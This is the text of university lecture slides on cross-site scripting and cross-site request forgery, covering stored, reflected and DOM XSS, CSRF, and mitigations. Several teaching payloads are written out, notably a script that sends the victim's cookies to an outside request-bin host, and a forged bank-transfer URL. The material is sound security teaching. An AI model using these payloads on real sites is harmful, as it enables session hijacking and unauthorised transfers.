VOTD: XSS & CSRF Engineering Secure Software Last Revised: - - PowerPoint PPT Presentation

SWEN-331: Engineering Secure Software Benjamin S Meyers

VOTD: XSS & CSRF

Engineering Secure Software

Last Revised: September 8, 2020 1

SWEN-331: Engineering Secure Software Benjamin S Meyers

What is XSS?

• XSS: Cross Site Scripting
• Injecting malicious scripts into a web page
• CWE-79

2

SWEN-331: Engineering Secure Software Benjamin S Meyers

Types of XSS

• Stored

○ The malicious script gets saved to the webserver ○ Usually stored in a database

• Reflected

○ The malicious script does not get saved to the webserver, but its execution is reflected in the website’s results/GUI

• DOM: Document Object Model

○ DOM environment is being changed, but the website code remains unchanged

3

SWEN-331: Engineering Secure Software Benjamin S Meyers

Reflected XSS Example

• <script>alert(“You’ve been hacked!”)</script>

4

SWEN-331: Engineering Secure Software Benjamin S Meyers

Reflected XSS Example

• <img src=“http://www.page.com/img.jpg”>

5

SWEN-331: Engineering Secure Software Benjamin S Meyers

Stored XSS Example

• Same as reflected, but the malicious script gets saved in the

database and executed every time the field with the script gets displayed on the page

• DVWA → XSS (Stored)

○ Enter <script>alert(“You’ve been hacked!”)</script> in the comments box ○ Every time you hit “Sign Guestbook”, the script will execute again

6

SWEN-331: Engineering Secure Software Benjamin S Meyers

DOM XSS Example

• Changing the DOM environment in a browser causes the

client-side code (which is unchanged) to execute differently

• Normal URL:

http://testing.com/book.html?default=1

Attacked URL:

http://testing.com/book.html?default=<script>alert(document.cookie)</script>

7

SWEN-331: Engineering Secure Software Benjamin S Meyers

Mitigations

• Defense in Depth

○ Thorough input validation ○ Accept only known good inputs (e.g. whitelist) ○ Escape special characters (e.g. < to &lt;)

• Code reviews!
• Automated testing

○ Fuzzers!

• Input sanitization libraries

○ Ruby on Rails: sanitize gem

8

SWEN-331: Engineering Secure Software Benjamin S Meyers

Notes

• Commonly used for session hijacking
• Has been used against GMail, Twitter, Facebook, Yahoo, etc.
• Good discussion of XSS and exploits
• Not just <script> tags

○ e.g. CSS injection ○ e.g. Image metadata ○ e.g. File uploads (fake images that are actually PHP scripts)

9

<script> x = new XMLHttpRequest(); x.open("GET", "http://requestb.in/13x2ec31?s=" + document.cookie, true); x.send(); </script>

SWEN-331: Engineering Secure Software Benjamin S Meyers

What is CSRF?

• CSRF: Cross Site Request Forgery

○ XSS exploits the trust that a client has for a website ○ CSRF exploits the trust that a site has for the user

• Running malicious scripts on behalf of an authenticated user
• Usually: when an HTTP GET request makes a persistent

modification, then you can get users to make changes to

• ther websites they are already authenticated into
• CWE-352

10 10

SWEN-331: Engineering Secure Software Benjamin S Meyers

CSRF Examples

• Malicious links in emails sent from a trusted address
• Modifying arguments in a URL query string to cause

malicious behavior

○ http://bank.com/transfer.do?acct=BEN&amount=100000

11 11

SWEN-331: Engineering Secure Software Benjamin S Meyers

Mitigations

• Don’t allow GET actions to make persistent modifications

○ If you have to use GET, make it re-authenticate

• Don’t allow session tokens in URL query strings, only cookies
• Don’t load images in emails from untrusted addresses

○ Image metadata can contain scripts that get run when loaded

• Don’t open emails from untrusted addresses, period

12 12